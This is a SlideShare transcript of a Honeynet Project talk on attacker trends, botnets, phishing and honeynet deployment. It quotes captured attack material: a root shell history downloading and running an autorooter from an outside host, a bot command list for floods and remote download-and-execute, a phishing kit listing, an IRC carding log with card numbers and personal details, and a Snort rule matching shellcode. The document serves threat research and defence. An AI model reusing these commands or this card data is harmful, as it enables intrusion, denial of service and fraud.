• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Honeypot Project

Honeypot Project






Total Views
Views on SlideShare
Embed Views



10 Embeds 274

http://www.secguru.com 155
http://barceludena.wordpress.com 69
http://www.techgig.com 32 7
http://www.slideshare.net 4 2
http://www.frugalteacher.com 2 1 1 1



Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.


13 of 3 previous next Post a comment

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
  • plese send ppt of honeypot to me at
    Are you sure you want to
    Your message goes here
  • Please send me this ppt on sarishti_kapoor@yahoo.com.I would be grateful to you. :)
    Are you sure you want to
    Your message goes here
  • how to download this ppt...........plz help its urgent
    Are you sure you want to
    Your message goes here
Post Comment
Edit your comment

Honeypot Project Honeypot Project Presentation Transcript

  • Honeynets and The Honeynet Project
  • Speaker
  • Purpose
    • To explain our organization, our value to you, and our research.
  • Agenda
    • The Honeynet Project and Research Alliance
    • The Threat
    • How Honeynets Work
    • Learning More
  • Honeynet Project
  • Problem
    • How can we defend against an enemy, when we don’t even know who the enemy is?
  • Mission Statement
    • To learn the tools, tactics, and motives involved in computer and network attacks, and share the lessons learned.
  • Our Goal
    • Improve security of Internet at no cost to the public.
      • Awareness: Raise awareness of the threats that exist.
      • Information: For those already aware, we teach and inform about the threats.
      • Research: We give organizations the capabilities to learn more on their own.
  • Honeynet Project
    • Non-profit (501c3) organization with Board of Directors.
    • Funded by sponsors
    • Global set of diverse skills and experiences.
    • Open Source, share all of our research and findings at no cost to the public.
    • Deploy networks around the world to be hacked.
    • Everything we capture is happening in the wild.
    • We have nothing to sell.
  • Honeynet Research Alliance
    • Starting in 2002, the Alliance is a forum of organizations around the world actively researching, sharing and deploying honeypot technologies.
    • http://www.honeynet.org/alliance/
  • Alliance Members
    • South Florida Honeynet Project
    • Georgia Technical Institute
    • Azusa Pacific University
    • USMA Honeynet Project
    • Pakistan Honeynet Project
    • Paladion Networks Honeynet Project (India)
    • Internet Systematics Lab Honeynet Project (Greece)
    • Honeynet.BR (Brazil)
    • UK Honeynet
    • French Honeynet Project
    • Italian Honeynet Project
    • Portugal Honeynet Project
    • German Honeynet Project
    • Spanish Honeynet Project
    • Singapore Honeynet Project
    • China Honeynet Project
  • The Threat
  • What we have captured
    • The Honeynet Project has captured primarily external threats that focus on targets of opportunity.
    • Little has yet to be captured on advanced threats, few honeynets to date have been designed to capture them.
  • The Threat
    • Hundreds of scans a day.
    • Fastest time honeypot manually compromised, 15 minutes (worm, under 60 seconds).
    • Life expectancies: vulnerable Win32 system is under three hours, vulnerable Linux system is three months.
    • Primarily cyber-crime, focus on Win32 systems and their users.
    • Attackers can control thousands of systems (Botnets).
  • The Threat
  • The Motive
    • Motives vary, but we are seeing more and more criminally motivated.
    • Several years ago, hackers hacked computers. Now, criminals hack computers.
    • Fraud, extortion and identity theft have been around for centuries, the net just makes it easier.
  • DDoS for Money J4ck: why don't you start charging for packet attacks? J4ck: "give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
  • The Target
    • The mass users.
    • Tend to be non-security aware, making them easy targets.
    • Economies of scale (it’s a global target).
  • Interesting Trends
    • Attacks often originate from economically depressed countries (Romania is an example).
    • Attacks shifting from the computer to the user (computers getting harder to hack).
    • Attackers continue to get more sophisticated.
  • The Tools
    • Attacks used to be primarily worms and autorooters.
    • New advances include Botnets and Phishing.
    • Tools are constantly advancing.
  • The Old Days Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210 Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120 Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
  • Botnets
    • Large networks of hacked systems.
    • Often thousands, if not tens of thousands, of hacked systems under the control of a single user.
    • Automated commands used to control the ‘zombies’.
  • How They Work
    • After successful exploitation, a bot uses TFTP, FTP, or HTTP to download itself to the compromised host.
    • The binary is started, and connects to the hard-coded master IRC server.
    • Often a dynamic DNS name is provided rather than a hard coded IP address, so the bot can be easily relocated.
    • Using a special crafted nickname like USA|743634 the bot joins the master's channel, sometimes using a password to keep strangers out of the channel
  • 80% of traffic
    • Port 445/TCP
    • Port 139/TCP
    • Port 135/TCP
    • Port 137/UDP
    • Infected systems most often WinXP-SP1 and Win2000
  • Bots ddos.synflood [host] [time] [delay] [port] starts an SYN flood ddos.httpflood [url] [number] [referrer] [recursive = true||false] starts a HTTP flood scan.listnetranges list scanned netranges scan.start starts all enabled scanners scan.stop stops all scanners http.download download a file via HTTP http.execute updates the bot via the given HTTP URL http.update executes a file from a given HTTP URL cvar.set spam_aol_channel [channel] AOL Spam - Channel name cvar.set spam_aol_enabled [1/0] AOL Spam - Enabled?
  • Numbers
    • Over a 4 months period
      • More then 100 Botnets were tracked
      • One channel had over 200,000 IP addresses.
      • One computer was compromised by 16 Bots.
      • Estimate over 1 millions systems compromised.
  • Botnet Economy
    • Botnets sold or for rent.
    • Saw Botnets being stolen from each other.
    • Observed harvesting of information from all compromised machines. For example, the operator of the botnet can request a list of CD-keys (e.g. for Windows or games) from all bots. These CD-keys can be sold or used for other purposes since they are considered valuable information.
  • Phishing
    • Social engineer victims to give up valuable information (login, password, credit card number, etc).
    • Easier to hack the user then the computers.
    • Need attacks against instant messaging.
    • http://www.antiphishing.org
  • The Sting
  • Getting the Info
  • Infrastructure
    • Attackers build network of thousands of hacked systems (often botnets).
    • Upload pre-made pkgs for Phishing.
    • Use platforms for sending out spoofed email.
    • Use platforms for false websites.
  • A Phishing Rootkit
    • -rw-r--r-- 1 free web 14834 Jun 17 13:16 ebay only
    • -rw-r--r-- 1 free web 247127 Jun 14 19:58 emailer2.zip
    • -rw-r--r-- 1 free web 7517 Jun 11 11:53 html1.zip
    • -rw-r--r-- 1 free web 10383 Jul 3 19:07 index.html
    • -rw-r--r-- 1 free web 413 Jul 18 22:09 index.zip
    • -rw-r--r-- 1 free web 246920 Jun 14 20:38 massmail.tgz
    • -rw-r--r-- 1 free web 8192 Jun 12 07:18 massmail.zip
    • -rw-r--r-- 1 free web 12163 Jun 9 01:31 send.php
    • -rw-r--r-- 1 free web 2094 Jun 20 11:49 sendspamAOL1.tgz
    • -rw-r--r-- 1 free web 2173 Jun 14 22:58 sendspamBUN1.tgz
    • -rw-r--r-- 1 free web 2783 Jun 15 00:21 sendspamBUNzip1.zip
    • -rw-r--r-- 1 free web 2096 Jun 16 18:46 sendspamNEW1.tgz
    • -rw-r--r-- 1 free web 1574 Jul 11 01:08 sendbank1.tgz
    • -rw-r--r-- 1 free web 2238 Jul 18 23:07 sendbankNEW.tgz
    • -rw-r--r-- 1 free web 83862 Jun 9 09:56 spamz.zip
    • -rw-r--r-- 1 free web 36441 Jul 18 00:52 usNEW.zip
    • -rw-r--r-- 1 free web 36065 Jul 11 17:04 bank1.tgz
    • drwxr-xr-x 2 free web 49 Jul 16 12:26 banka
    • -rw-r--r-- 1 free web 301939 Jun 8 13:17 www1.tar.gz
    • -rw-r--r-- 1 free web 327380 Jun 7 16:24 www1.zip
  • Credit Cards Exchanging 04:55:16 COCO_JAA: !cc 04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9) 04:55:42 COCO_JAA: !cclimit 4407070000588951 04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel) 04:56:55 COCO_JAA: !cardablesite 04:57:22 COCO_JAA: !cardable electronics 04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9) 04:58:09 COCO_JAA: !cclimit 4234294391131136 04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
  • The Future
    • Hacking is profitable and difficult to get caught.
    • Expect more attacks to focus on the end user or the client.
    • Expect things to get worse, bad guys adapt faster.
  • Honeynets
  • Honeypots
    • A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.
    • Has no production value, anything going to or from a honeypot is likely a probe, attack or compromise.
    • Primary value to most organizations is information.
  • Advantages
    • Collect small data sets of high value.
    • Reduce false positives
    • Catch new attacks, false negatives
    • Work in encrypted or IPv6 environments
    • Simple concept requiring minimal resources.
  • Disadvantages
    • Limited field of view (microscope)
    • Risk (mainly high-interaction honeypots)
  • Types
    • Low-interaction
      • Emulates services, applications, and OS’s.
      • Low risk and easy to deploy/maintain, but capture limited information.
    • High-interaction
      • Real services, applications, and OS’s
      • Capture extensive information, but high risk and time intensive to maintain.
  • Examples of Honeypots
    • BackOfficer Friendly
    • KFSensor
    • Honeyd
    • Honeynets
    Low Interaction High Interaction
  • Honeynets
    • High-interaction honeypot designed to capture in-depth information .
    • Information has different value to different organizations.
    • Its an architecture you populate with live systems, not a product or software.
    • Any traffic entering or leaving is suspect.
  • How it works
    • A highly controlled network where every packet entering or leaving is monitored, captured, and analyzed.
      • Data Control
      • Data Capture
      • Data Analysis
  • Honeynet Architecture
  • Data Control
    • Mitigate risk of honeynet being used to harm non-honeynet systems.
    • Count outbound connections.
    • IPS (Snort-Inline)
    • Bandwidth Throttling*
  • No Data Control
  • Data Control
  • Snort-Inline alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:"DNS EXPLOIT named";flags: A+; content:"|CD80 E8D7 FFFFFF|/bin/sh"; replace: "| 0000 E8D7 FFFFFF|/ ben/sh ";)
  • Data Capture
    • Capture all activity at a variety of levels.
    • Network activity.
    • Application activity.
    • System activity.
  • Sebek
    • Hidden kernel module that captures all host activity
    • Dumps activity to the network.
    • Attacker cannot sniff any traffic based on magic number and dst port.
  • Sebek Architecture
  • Honeywall CDROM
    • Attempt to combine all requirements of a Honeywall onto a single, bootable CDROM.
    • May, 2003 - Released Eeyore
    • May, 2005 - Released Roo
  • Eeyore Problems
    • OS too minimized, almost crippled. Could not easily add functionality.
    • Difficult to modify since LiveCD.
    • Limited distributed capabilities
    • No GUI administration
    • No Data Analysis
    • No international or SCSI support
  • Roo Honeywall CDROM
    • Based on Fedora Core 3
    • Vastly improved hardware and international support.
    • Automated, headless installation
    • New Walleye interface for web based administration and data analysis.
    • Automated system updating.
  • Installation
    • Just insert CDROM and boot, it installs to local hard drive.
    • After it reboots for the first time, it runs a hardening script based on NIST and CIS security standards.
    • Following installation, you get a command prompt and system is ready to configure.
  • First Boot
  • Install
  • Configure
  • 3 Methods to Maintain
    • Command Line Interface
    • Dialog Interface
    • Web GUI ( Walleye )
  • Command Line Interface
    • Local or SSH access only.
    • Use the utility hwctl to modify configurations and restart services.
    • # hwctl HwTCPRATE=30
  • Dialog Menu
  • Data Administration
  • Data Analysis
    • Most critical part, the purpose of a honeynet is to gather information and learn.
    • Need a method to analyze all the different elements of information.
    • Walleye is the new solution, comes with the CDROM.
  • Walleye
  • Data Analysis
  • Data Analysis Flows
  • Data Analysis Details
  • Processes
  • Files
  • Distributed Capabilities
  • Issues
    • Require extensive resources to properly maintain.
    • Detection and anti-honeynet technologies have been introduced.
    • Can be used to attack or harm other non-Honeynet systems.
    • Privacy can be a potential issue.
  • Legal Contact for .mil / .gov
    • Department of Justice; Computer Crime and Intellectual Property Section.
      • Paul Ohm
        • Number: (202) 514.1026
        • E-Mail: [email_address]
  • Learning More
  • Our Website
    • Know Your Enemy papers.
    • Scan of the Month Challenges
    • Latest Tools and Technologies
    • http://www.honeynet.org/
  • Our Book http://www.honeynet.org/book
  • Sponsoring YOU? Advanced Network Management Lab
  • How to Sponsor
    • Sponsor development of a new tool
    • Sponsor authorship of a new research paper.
    • Sponsor research and development.
    • Buy our book
    <project@honeynet.org> http://www.honeynet.org/funds/
  • Conclusion
    • The Honeynet Project is a non-profit, research organization improving the security of the Internet at no cost to the public by providing tools and information on cyber security threats.
    • http://www.honeynet.org
      • <project@honeynet.org>